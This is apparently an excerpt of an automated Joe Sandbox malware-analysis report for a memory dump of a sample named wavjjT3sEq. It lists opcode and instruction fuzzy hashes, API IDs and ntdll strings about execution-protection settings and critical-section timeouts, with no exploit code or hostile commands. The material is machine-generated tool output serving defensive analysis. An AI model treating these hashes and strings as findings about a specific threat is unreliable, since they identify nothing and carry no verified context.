                                                                                                                                                              • Instruction Fuzzy Hash: D990023120150842D1047158440CB4640499BE0301F55C026A0164654DC615C9517621
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 7a807197ec12f7df2785ddc84948c45065217bbe3c9aebca8e85f0969eb773d9
                                                                                                                                                              • Instruction ID: 766c49ecd2851af93006ad01ec78266555685013ff2f75154e7439990ba88f08
                                                                                                                                                              • Opcode Fuzzy Hash: 7a807197ec12f7df2785ddc84948c45065217bbe3c9aebca8e85f0969eb773d9
                                                                                                                                                              • Instruction Fuzzy Hash: E390023120190402D1047158481C70B40499BD0302F55C021A11A4555DC62589516671
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 3827f71866f97da4f1d3d785d4c2c1a51fac6ecd30466efc75ed44c77bec6483
                                                                                                                                                              • Instruction ID: c841212334b422d21c65110abc9f3cc749e7a289fe7a99a4cd2213f92c5e78a9
                                                                                                                                                              • Opcode Fuzzy Hash: 3827f71866f97da4f1d3d785d4c2c1a51fac6ecd30466efc75ed44c77bec6483
                                                                                                                                                              • Instruction Fuzzy Hash: D29002216015004241447168884C9068049BFE1211755C131A09D8550DC55989655765
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: c996e58b55747eace33ffd0bf4acdf47f611abb1ba31c0845084e34937ff2369
                                                                                                                                                              • Instruction ID: 9b98d7c0ced3f5d0783ada79de48f393e3ff40d9714178a064cd8d79a4fae8e7
                                                                                                                                                              • Opcode Fuzzy Hash: c996e58b55747eace33ffd0bf4acdf47f611abb1ba31c0845084e34937ff2369
                                                                                                                                                              • Instruction Fuzzy Hash: 1990023120190402D1047158480C74740499BD0302F55C021A51A4555EC665C9916631
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ___swprintf_l
                                                                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                              • API String ID: 48624451-2108815105
                                                                                                                                                              Strings
                                                                                                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 019946FC
                                                                                                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01994742
                                                                                                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01994725
                                                                                                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01994655
                                                                                                                                                              • ExecuteOptions, xrefs: 019946A0
                                                                                                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 01994787
                                                                                                                                                              • Execute=1, xrefs: 01994713
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                              • API String ID: 0-484625025
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: __aulldvrm
                                                                                                                                                              • String ID: +$-$0$0
                                                                                                                                                              • API String ID: 1302938615-699404926
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ___swprintf_l
                                                                                                                                                              • String ID: %%%u$[$]:%u
                                                                                                                                                              • API String ID: 48624451-2819853543
                                                                                                                                                              Strings
                                                                                                                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 019902BD
                                                                                                                                                              • RTL: Re-Waiting, xrefs: 0199031E
                                                                                                                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 019902E7
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                                              • API String ID: 0-2474120054
                                                                                                                                                              APIs
                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0199728C
                                                                                                                                                              Strings
                                                                                                                                                              • RTL: Re-Waiting, xrefs: 019972C1
                                                                                                                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01997294
                                                                                                                                                              • RTL: Resource at %p, xrefs: 019972A3
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                              • API String ID: 885266447-605551621
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ___swprintf_l
                                                                                                                                                              • String ID: %%%u$]:%u
                                                                                                                                                              • API String ID: 48624451-3050659472
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: $$@
                                                                                                                                                              • API String ID: 0-1194432280
                                                                                                                                                              APIs
                                                                                                                                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 019ACFBD
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CallFilterFunc@8
                                                                                                                                                              • String ID: @$@4Qw@4Qw
                                                                                                                                                              • API String ID: 4062629308-2383119779